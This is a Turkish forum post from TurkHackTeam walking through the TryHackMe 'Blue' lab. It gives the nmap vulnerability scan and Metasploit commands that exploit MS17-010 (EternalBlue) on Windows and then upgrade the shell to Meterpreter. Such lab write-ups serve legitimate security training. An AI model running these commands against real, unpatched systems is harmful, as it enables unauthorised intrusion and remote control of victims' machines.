Herkese merhaba TurkHackTeam üyeleri, Ben Uchiha-Sasuke Bu konumda sizlere TryHackMe Blue adlı makinenin çözümü göstereceğim. https://media.giphy.com/media/1TAIxQoE4tG0EfYmvt/giphy.gif Room'u Deploy edelim. https://i.hizliresim.com/gPh51j.png Ardından NMAP taraması yapalım. https://i.hizliresim.com/Ygu8MW.png Komutumuz; nmap -sV -vv --script vuln IP Ardından komutu çalıştıralım. https://i.hizliresim.com/BwymXM.png https://i.hizliresim.com/Bj9euc.png Gördüğünüz gibi bize açık portları verdi, ncak bizim işimize yarayacak olan şey bu değil. Altta ms17-010 açığının olduğunu görüyoruz. Bu açık meşhur Windows zafiyetlerinden biridir. Şimdi ****sploiti çalıştıralım. https://i.hizliresim.com/iacm4A.png Komutumuz; msfconsole Bulduğumuz açığı aratalım. https://i.hizliresim.com/GVtSBy.png Komutumuz; search ms17-010 2. Seçeneği kullanacağız. https://i.hizliresim.com/AHXopW.png Komutumuz; use 3 Şimdi ise doldurmamız gereken yeri dolduracağız. https://i.hizliresim.com/GdhASf.png Komutumuz; show options Gördüğünüz gibi birkaç doldurulabilen yer var ama biz sadece RHOSTS parametresini dolduracağız. https://i.hizliresim.com/FKFUca.png Komutumuz; set RHOSTS IP run Run yani çalıştırma komutumuzu yazdıktan sonra bir hata vermezse başardık demektir. https://i.hizliresim.com/vLOLYo.png https://i.hizliresim.com/WArjw5.png Görüldüğü üzere hedef sisteme erişimimizi başarılı bir şekilde sağladık. Şimdi ise oturumu arka plana alalım. https://i.hizliresim.com/MlVLqS.png Komutumuz; background y Şimdi yapacağım iş ise birnevi yetki yükselteceğiz. https://i.hizliresim.com/ehCLKU.png Komutumuz; use post/multi/manage/shell_to_meterpreter Şimdi tekrardan show options komutunu çalıştırıp gerekli yerleri dolduracağız. https://i.hizliresim.com/Oi4vOP.png Gördüğünüz gibi pek doldurulacak şey yok. Yanlızca session'u ayarlayacağız. https://i.hizliresim.com/qoeUAB.png Komutumuz; set sessions 1 run https://i.hizliresim.com/iEQZ92.png Gördüğünüz gibi komutumuz başarılı bir şekilde çalıştı, kontrol etmek için; https://i.hizliresim.com/hwd2Pz.png Komutumuz; sessions Resimde görüldüğü gibi id 1 session yetkisiz, id 2 session yetkiye sahip. Session 2'de oturum açmak için; https://i.hizliresim.com/kpO0Iv.png Komutumuz; sessions -i 2 Ve başarılı bir şekilde giriş yaptık. Bu konumunda burda sonuna gelmiş bulunmaktayım. Uchiha iyi günler diler. https://i.imgyukle.com/2019/09/20/oKEKz1.gif Daha Fazlası İçin Dergi 43 Sayısını Ziyaret ediniz..
Terör İhbar Hattı
